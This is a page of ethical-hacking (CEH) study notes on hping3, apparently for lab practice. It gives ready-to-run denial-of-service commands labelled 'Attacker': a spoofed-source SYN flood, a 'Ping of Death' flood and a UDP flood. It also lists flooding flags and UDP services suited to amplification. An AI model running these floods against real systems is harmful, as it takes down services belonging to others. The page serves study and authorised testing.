Practical CEH Notes & Tools
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • ๐Ÿ““Practical Ethical Hacker Notes
    • ๐Ÿ“šMain Contents
      • 2 - Footprinting & Recon
      • 3 - Scanning Networks
      • 4 - Enumeration
      • 5 - Vulnerability Analysis
      • 6 - System Hacking
      • 7 - Malware
      • 8 - Sniffing
      • 10 - DoS
      • 11 - Session Hijacking
      • 13 - Hacking Web Servers
      • 14 - Hacking Web Apps
      • 15 - SQL Injection
      • 16 - Hacking Wireless
      • 17 - Hacking Mobile
      • 18 - IoT and OT Hacking
      • 19 - Cloud Computing
      • 20 - Cryptography
    • ๐Ÿ‘จโ€๐ŸŽ“Study Walkthrough
      • ๐ŸงชLabs and Training
    • Tools ๐Ÿ› ๏ธ
      • ๐Ÿค–Adb tool
      • ๐Ÿ”BCTextEncoder
      • ๐ŸŸงBurp Suite
      • ๐Ÿ‘จโ€๐Ÿ’ปCewl
      • ๐Ÿ“Crunch
      • ๐Ÿ—ƒ๏ธDirb
      • ๐ŸงEnum4linux
      • ๐Ÿ”—Gobuster
      • ๐Ÿ”“Hashcalc
      • ๐Ÿ˜บHashcat
      • ๐Ÿ‘‰Hping3
      • ๐Ÿ‰Hydra
      • ๐ŸฅทJohn the Ripper
      • โ“‚๏ธMetasploit
      • 5๏ธโƒฃMd5 Calculator
      • ๐Ÿ‘ฝNikto
      • ๐Ÿ‘๏ธNmap
      • ๐Ÿ–ผ๏ธOpenstego
      • ๐ŸŽจQuickStego
      • ๐ŸŒˆRainbowCrack
      • โ†—๏ธResponder LLMNR
      • ๐Ÿ•ท๏ธSearchsploit
      • โ›„Snow
      • ๐ŸŒ€Stego
      • ๐Ÿ’‰SQLMap
      • โš™๏ธSteghide
      • โš—๏ธStegimage
      • ๐Ÿ”‘Veracrypt
      • ๐ŸฆˆWireshark or Tcpdump
      • ๐Ÿ”WPScan
      • โšกZap
Powered by GitBook
On this page
  1. Practical Ethical Hacker Notes
  2. Tools ๐Ÿ› ๏ธ

Hping3

https://www.kali.org/tools/hping3/

Attacker

hping3 -S [Target IP] -a [Spoofable IP] -p 22 -flood

  • -S: Set the SYN flag

  • -a: Spoof the IP address

  • -p: Specify the destination port

  • โ€” flood: Send a huge number of packets

Attacker (Perform PoD)

hping3 -d 65538 -S -p 21 โ€“flood [Target IP]

  • -d: Specify data size

  • -S: Set the SYN flag

Attacker (Perform UDP application layer flood attack)

  • nmap -p 139 10.10.10.19 (check service)

  • hping3 -2 -p 139 โ€“flood [IP]

Other Hping3 flags

  • --udp -> specifies sending the UDP packets to the target host

  • -2 -> specifies UDP mode

  • --rand-source -> enables random source mode

  • --data -> specifies the data body size

  • -d -> specifies the data size

  • -S -> sets the SYN flag

  • -p -> assigning the port to send the traffic

  • -c -> count of packets sent

  • --flood -> performs TCP flooding (sends a huge # of packets)

Other UDP-based applications and their ports

  • CharGen UDP Port 19

  • SNMPv2 UDP Port 161

  • QOTD UDP Port 17

  • RPC UDP Port 135

  • SSDP UDP Port 1900

  • CLDAP UDP Port 389

  • TFTP UDP Port 69

  • NetBIOS UDP Port 137,138,139

  • NTP UDP Port 123

  • Quake Network Protocol UDP Port 26000

  • VoIP UDP Port 5060

PreviousHashcatNextHydra

Last updated 1 year ago

๐Ÿ““
๐Ÿ‘‰
hping3 | Kali Linux ToolsKali Linux
Logo